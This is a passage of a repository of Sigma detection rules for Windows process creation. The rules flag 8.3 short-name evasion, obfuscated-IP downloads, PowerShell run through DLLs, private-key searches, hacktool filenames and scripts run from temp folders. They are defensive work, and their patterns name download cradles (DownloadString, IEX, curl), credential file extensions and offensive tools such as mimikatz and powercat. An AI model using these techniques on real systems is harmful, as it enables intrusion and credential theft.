    "content": "title: Use Short Name Path in Image\nid: a96970af-f126-420d-90e1-d37bf25e50e1\nrelated:\n    - id: 349d891d-fef0-4fe4-bc53-eee623a15969\n      type: similar\nstatus: test\ndescription: Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/frack113/status/1555830623633375232\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-07\nmodified: 2025-10-20\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '~1\\'\n            - '~2\\'\n    filter_main_system_process:\n        ParentImage:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\cleanmgr.exe'  # Spawns DismHost.exe with a shortened username (if too long)\n    filter_main_installers:\n        - Image|contains|all:\n              - '\\AppData\\'\n              - '\\Temp\\'\n        - Image|endswith:\n              - '~1\\unzip.exe'\n              - '~1\\7zG.exe'\n    filter_optional_webex:\n        ParentImage|endswith: '\\WebEx\\WebexHost.exe' # Spawns a shortened version of the CLI and Image processes\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_installshield:\n        - Product: 'InstallShield (R)'\n        - Description: 'InstallShield (R) Setup Engine'\n        - Company: 'InstallShield Software Corporation'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Applications could use this notation occasionally, which might generate some false positives. In that case, investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml",
    "content": "title: Use NTFS Short Name in Command Line\nid: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795\nrelated:\n    - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b\n      type: similar\nstatus: test\ndescription: Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/jonasLyk/status/1555914501802921984\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2022-09-21\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '~1.exe'\n            - '~1.bat'\n            - '~1.msi'\n            - '~1.vbe'\n            - '~1.vbs'\n            - '~1.dll'\n            - '~1.ps1'\n            - '~1.js'\n            - '~1.hta'\n            - '~2.exe'\n            - '~2.bat'\n            - '~2.msi'\n            - '~2.vbe'\n            - '~2.vbs'\n            - '~2.dll'\n            - '~2.ps1'\n            - '~2.js'\n            - '~2.hta'\n    filter:\n        - ParentImage|endswith:\n              - '\\WebEx\\WebexHost.exe'\n              - '\\thor\\thor64.exe'\n        - CommandLine|contains: 'C:\\xampp\\vcredist\\VCREDI~1.EXE'\n    condition: selection and not filter\nfalsepositives:\n    - Applications could use this notation occasionally, which might generate some false positives. In that case, investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml",
    "content": "title: Use NTFS Short Name in Image\nid: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b\nrelated:\n    - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795\n      type: similar\nstatus: test\ndescription: Detect use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/jonasLyk/status/1555914501802921984\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-06\nmodified: 2023-07-20\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '~1.bat'\n            - '~1.dll'\n            - '~1.exe'\n            - '~1.hta'\n            - '~1.js'\n            - '~1.msi'\n            - '~1.ps1'\n            - '~1.tmp'\n            - '~1.vbe'\n            - '~1.vbs'\n            - '~2.bat'\n            - '~2.dll'\n            - '~2.exe'\n            - '~2.hta'\n            - '~2.js'\n            - '~2.msi'\n            - '~2.ps1'\n            - '~2.tmp'\n            - '~2.vbe'\n            - '~2.vbs'\n    filter_main_generic_parent:\n        ParentImage: 'C:\\Windows\\explorer.exe'\n    filter_optional_webex:\n        ParentImage|endswith: '\\WebEx\\WebexHost.exe'\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_winzip:\n        Image: 'C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE'\n    filter_optional_vcred:\n        Image|endswith: '\\VCREDI~1.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Software Installers\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml",
    "content": "title: Obfuscated IP Download Activity\nid: cb5a2333-56cf-4562-8fcb-22ba1bca728d\nstatus: test\ndescription: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in a URL combined with a download command\nreferences:\n    - https://h.43z.one/ipconverter/\n    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608\n    - https://twitter.com/fr0s7_/status/1712780207105404948\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-08-03\nmodified: 2025-07-18\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_command:\n        CommandLine|contains:\n            - 'Invoke-WebRequest'\n            - 'iwr '\n            - 'Invoke-RestMethod'\n            - 'irm '\n            - 'wget '\n            - 'curl '\n            - 'DownloadFile'\n            - 'DownloadString'\n    selection_ip_1:\n        CommandLine|contains:\n            - ' 0x'\n            - '//0x'\n            - '.0x'\n            - '.00x'\n    selection_ip_2:\n        CommandLine|contains|all:\n            - 'http://%'\n            - '%2e'\n    selection_ip_3:\n        # http://81.4.31754\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}'\n        # http://81.293898\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.0[0-9]{3,7}'\n        # http://1359248394\n        - CommandLine|re: 'https?://0[0-9]{3,11}'\n        # http://0121.04.0174.012\n        - CommandLine|re: 'https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}'\n        # http://012101076012\n        - CommandLine|re: 'https?://0[0-9]{1,11}'\n        # For octal format\n        - CommandLine|re: ' [0-7]{7,13}'\n    filter_main_valid_ip:\n        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}'\n    condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml",
    "content": "title: Obfuscated IP Via CLI\nid: 56d19cb4-6414-4769-9644-1ed35ffbb148\nstatus: test\ndescription: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line\nreferences:\n    - https://h.43z.one/ipconverter/\n    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-08-03\nmodified: 2023-11-06\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\ping.exe'\n            - '\\arp.exe'\n    selection_ip_1:\n        CommandLine|contains:\n            - ' 0x'\n            - '//0x'\n            - '.0x'\n            - '.00x'\n    selection_ip_2:\n        CommandLine|contains|all:\n            - 'http://%'\n            - '%2e'\n    selection_ip_3:\n        # http://81.4.31754\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}'\n        # http://81.293898\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.0[0-9]{3,7}'\n        # http://1359248394\n        - CommandLine|re: 'https?://0[0-9]{3,11}'\n        # http://0121.04.0174.012\n        - CommandLine|re: 'https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}'\n        # http://012101076012\n        - CommandLine|re: 'https?://0[0-9]{1,11}'\n        # For octal format\n        - CommandLine|re: ' [0-7]{7,13}'\n    filter_main_valid_ip:\n        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}'\n    condition: selection_img and 1 of selection_ip_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_parents.yml",
    "content": "title: Suspicious Process Parents\nid: cbec226f-63d9-4eca-9f52-dfb6652f24df\nstatus: test\ndescription: Detects suspicious parent processes that should not have any children or should only have a single possible child program\nreferences:\n    - https://twitter.com/x86matthew/status/1505476263464607744?s=12\n    - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-21\nmodified: 2022-09-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\minesweeper.exe'\n            - '\\winver.exe'\n            - '\\bitsadmin.exe'\n    selection_special:\n        ParentImage|endswith:\n            - '\\csrss.exe'\n            - '\\certutil.exe'\n         # - '\\schtasks.exe'\n            - '\\eventvwr.exe'\n            - '\\calc.exe'\n            - '\\notepad.exe'\n    filter_special:\n        Image|endswith:\n            - '\\WerFault.exe'\n            - '\\wermgr.exe'\n            - '\\conhost.exe' # csrss.exe, certutil.exe\n            - '\\mmc.exe'     # eventvwr.exe\n            - '\\win32calc.exe' # calc.exe\n            - '\\notepad.exe'\n    filter_null:\n        Image: null\n    condition: selection or ( selection_special and not 1 of filter_* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml",
    "content": "title: Potential PowerShell Execution Via DLL\nid: 6812a10b-60ea-420c-832f-dfcc33b646ba\nstatus: test\ndescription: |\n    Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\n    This detection assumes that PowerShell commands are passed via the CommandLine.\nreferences:\n    - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-08-25\nmodified: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\InstallUtil.exe'\n              - '\\RegAsm.exe'\n              - '\\RegSvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n        - OriginalFileName:\n              - 'InstallUtil.exe'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'Default.GetString'\n            - 'DownloadString'\n            - 'FromBase64String'\n            - 'ICM '\n            - 'IEX '\n            - 'Invoke-Command'\n            - 'Invoke-Expression'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml",
    "content": "title: Privilege Escalation via Named Pipe Impersonation\nid: 9bd04a79-dabe-4f1f-a5ff-92430265c96b\nrelated:\n    - id: f35c5d71-b489-4e22-a115-f003df287317\n      type: derived\nstatus: test\ndescription: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\nmodified: 2022-12-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n    selection_args:\n        CommandLine|contains|all:\n            - 'echo'\n            - '>'\n            - '\\\\\\\\.\\\\pipe\\\\'\n    condition: all of selection*\nfalsepositives:\n    - Other programs that cause these patterns (please report)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml",
    "content": "title: Private Keys Reconnaissance Via CommandLine Tools\nid: 213d6a77-3d55-4ce8-ba74-fcfef741974e\nstatus: test\ndescription: Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-20\nmodified: 2023-03-06\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_cli:\n        CommandLine|contains: 'dir '\n    selection_pwsh_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains: 'Get-ChildItem '\n    selection_findstr:\n        - Image|endswith: '\\findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_ext:\n        CommandLine|contains:\n            - '.key'\n            - '.pgp'\n            - '.gpg'\n            - '.ppk'\n            - '.p12'\n            - '.pem'\n            - '.pfx'\n            - '.cer'\n            - '.p7b'\n            - '.asc'\n    condition: selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml",
    "content": "title: Suspicious RunAs-Like Flag Combination\nid: 50d66fb0-03f8-4da0-8add-84e77d12a020\nstatus: test\ndescription: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-11\ntags:\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_user:\n        CommandLine|contains:\n            - ' -u system '\n            - ' --user system '\n            - ' -u NT'\n            - ' -u \"NT'\n            - \" -u 'NT\"\n            - ' --system '\n            - ' -u administrator '\n    selection_command:\n        CommandLine|contains:\n            - ' -c cmd'\n            - ' -c \"cmd'\n            - ' -c powershell'\n            - ' -c \"powershell'\n            - ' --command cmd'\n            - ' --command powershell'\n            - ' -c whoami'\n            - ' -c wscript'\n            - ' -c cscript'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml",
    "content": "title: Windows Processes Suspicious Parent Directory\nid: 96036718-71cc-4027-a538-d1587e0006a7\nstatus: test\ndescription: Detect suspicious parent processes of well-known Windows processes\nreferences:\n    - https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\n    - https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/\n    - https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf\nauthor: vburov\ndate: 2019-02-23\nmodified: 2025-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\svchost.exe'\n            - '\\taskhost.exe'\n            - '\\lsm.exe'\n            - '\\lsass.exe'\n            - '\\services.exe'\n            - '\\lsaiso.exe'\n            - '\\csrss.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n    filter_sys:\n        - ParentImage|endswith:\n              - '\\SavService.exe'\n              - '\\ngen.exe'\n        - ParentImage|contains:\n              - '\\System32\\'\n              - '\\SysWOW64\\'\n    filter_msmpeng:\n        ParentImage|contains:\n            - '\\Windows Defender\\'\n            - '\\Microsoft Security Client\\'\n        ParentImage|endswith: '\\MsMpEng.exe'\n    filter_null:\n        - ParentImage: null\n        - ParentImage:\n              - ''\n              - '-'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Some security products seem to spawn these\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_progname.yml",
    "content": "title: Suspicious Program Names\nid: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6\nstatus: test\ndescription: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\nmodified: 2023-03-22\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|contains:\n              - '\\CVE-202' # Update this when we reach the year 2100\n              - '\\CVE202' # Update this when we reach the year 2100\n        - Image|endswith:\n              - '\\poc.exe'\n              - '\\artifact.exe'\n              - '\\artifact64.exe'\n              - '\\artifact_protected.exe'\n              - '\\artifact32.exe'\n              - '\\artifact32big.exe'\n              - 'obfuscated.exe'\n              - 'obfusc.exe'\n              - '\\meterpreter'\n    selection_commandline:\n        CommandLine|contains:\n            - 'inject.ps1'\n            - 'Invoke-CVE'\n            - 'pupy.ps1'\n            - 'payload.ps1'\n            - 'beacon.ps1'\n            - 'PowerView.ps1'\n            - 'bypass.ps1'\n            - 'obfuscated.ps1'\n            - 'obfusc.ps1'\n            - 'obfus.ps1'\n            - 'obfs.ps1'\n            - 'evil.ps1'\n            - 'MiniDogz.ps1'\n            - '_enc.ps1'\n            - '\\shell.ps1'\n            - '\\rshell.ps1'\n            - 'revshell.ps1'\n            - '\\av.ps1'\n            - '\\av_test.ps1'\n            - 'adrecon.ps1'\n            - 'mimikatz.ps1'\n            - '\\PowerUp_'\n            - 'powerup.ps1'\n            - '\\Temp\\a.ps1'\n            - '\\Temp\\p.ps1'\n            - '\\Temp\\1.ps1'\n            - 'Hound.ps1'\n            - 'encode.ps1'\n            - 'powercat.ps1'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate tools that accidentally match on the searched patterns\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_recon.yml",
    "content": "title: Recon Information for Export with Command Prompt\nid: aa2efee7-34dd-446e-8a37-40790a66efd7\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: similar\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-09-13\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_image:\n        - Image|endswith:\n              - '\\tree.com'\n              - '\\WMIC.exe'\n              - '\\doskey.exe'\n              - '\\sc.exe'\n        - OriginalFileName:\n              - 'wmic.exe'\n              - 'DOSKEY.EXE'\n              - 'sc.exe'\n    selection_redirect:\n        ParentCommandLine|contains:\n            - ' > %TEMP%\\'\n            - ' > %TMP%\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml",
    "content": "title: Suspicious Process Execution From Fake Recycle.Bin Folder\nid: 5ce0f04e-3efc-42af-839d-5b3a543b76c0\nrelated:\n    - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\n      type: derived\nstatus: test\ndescription: Detects process execution from a fake recycle bin folder, often used to avoid security solutions.\nreferences:\n    - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets\n    - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            # e.g. C:\\$RECYCLER.BIN\n            - 'RECYCLERS.BIN\\'\n            - 'RECYCLER.BIN\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml",
    "content": "title: Suspicious Redirection to Local Admin Share\nid: ab9e3b40-0c85-4ba1-aede-455d226fd124\nstatus: test\ndescription: Detects a suspicious output redirection to the local admin share; this technique is often found in malicious scripts or hacktool stagers\nreferences:\n    - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-16\nmodified: 2023-12-28\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_redirect:\n        CommandLine|contains: '>'\n    selection_share:\n        CommandLine|contains:\n            - '\\\\\\\\127.0.0.1\\\\admin$\\\\'\n            - '\\\\\\\\localhost\\\\admin$\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml",
    "content": "title: Registry Modification of MS-settings Protocol Handler\nid: dd3ee8cc-f751-41c9-ba53-5a32ed47e563\nrelated:\n    - id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7\n      type: similar\nstatus: test\ndescription: |\n    Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.\n    Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://www.trendmicro.com/en_us/research/25/f/water-curse.html\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-12-20\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1548.002\n    - attack.t1546.001\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_pwsh_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n    selection_reg_cli:\n        CommandLine|contains: 'add'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - 'New-ItemProperty'\n            - 'Set-ItemProperty'\n            - 'ni '\n            - 'sp '\n    selection_cli_key:\n        CommandLine|contains: '\\ms-settings\\shell\\open\\command'\n    condition: (all of selection_reg_* or all of selection_pwsh_*) and selection_cli_key\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml",
    "content": "title: Potential Remote Desktop Tunneling\nid: 8a3038e8-9c9d-46f8-b184-66234a160f6f\nstatus: test\ndescription: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line\n    selection_opt:\n        CommandLine|contains:\n            - ' -L '\n            - ' -P '\n            - ' -R '\n            - ' -pw '\n            - ' -ssh '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml",
    "content": "title: Potential Defense Evasion Via Right-to-Left Override\nid: ad691d92-15f2-4181-9aa4-723c74f9ddc3\nrelated:\n    - id: e0552b19-5a83-4222-b141-b36184bb8d79\n      type: derived\n    - id: 584bca0f-3608-4402-80fd-4075ff6072e3\n      type: derived\nstatus: test\ndescription: |\n    Detects the presence of the \"U+202E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\n    This is used as an obfuscation and masquerading technique.\nreferences:\n    - https://redcanary.com/blog/right-to-left-override/\n    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\n    - https://unicode-explorer.com/c/202E\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\u202e'  # Unicode RTLO character\n            - '[U+202E]'\n    condition: selection\nfalsepositives:\n    - Command lines that contain scripts such as Arabic or Hebrew might make use of this character\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml",
    "content": "title: Script Interpreter Execution From Suspicious Folder\nid: 1228c958-e64e-4e71-92ad-7d429f4138ba\nstatus: test\ndescription: Detects a suspicious script execution in temporary folders or folders accessible by environment variables\nreferences:\n    - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\n    - https://learn.microsoft.com/en-us/windows/win32/shell/csidl\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-08\nmodified: 2023-06-16\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_proc_image:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n    selection_proc_flags:\n        CommandLine|contains:\n            - ' -ep bypass '\n            - ' -ExecutionPolicy bypass '\n            - ' -w hidden '\n            - '/e:javascript '\n            - '/e:Jscript '\n            - '/e:vbscript '\n    selection_proc_original:\n        OriginalFileName:\n            - 'cscript.exe'\n            - 'mshta.exe'\n            - 'wscript.exe'\n    selection_folders_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\Temp'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp'\n    selection_folders_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: 1 of selection_proc_* and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml",
    "content": "title: Suspicious Script Execution From Temp Folder\nid: a6a39bdb-935c-4f0a-ab77-35f4bbf44d33\nstatus: test\ndescription: Detects suspicious script executions from temporary folders\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton\ndate: 2021-07-14\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        CommandLine|contains:\n            - '\\Windows\\Temp'\n            - '\\Temporary Internet'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\Temp'\n            - '%TEMP%'\n            - '%TMP%'\n            - '%LocalAppData%\\Temp'\n    filter:\n        CommandLine|contains:\n            - ' >'\n            - 'Out-File'\n            - 'ConvertTo-Json'\n            - '-WindowStyle hidden -Verb runAs'  # VSCode behaviour if file cannot be written as current user\n            - '\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\' # EC2 AWS\n    condition: selection and not filter\nfalsepositives:\n    - Administrative scripts\nlevel: high\n"
  },
  {
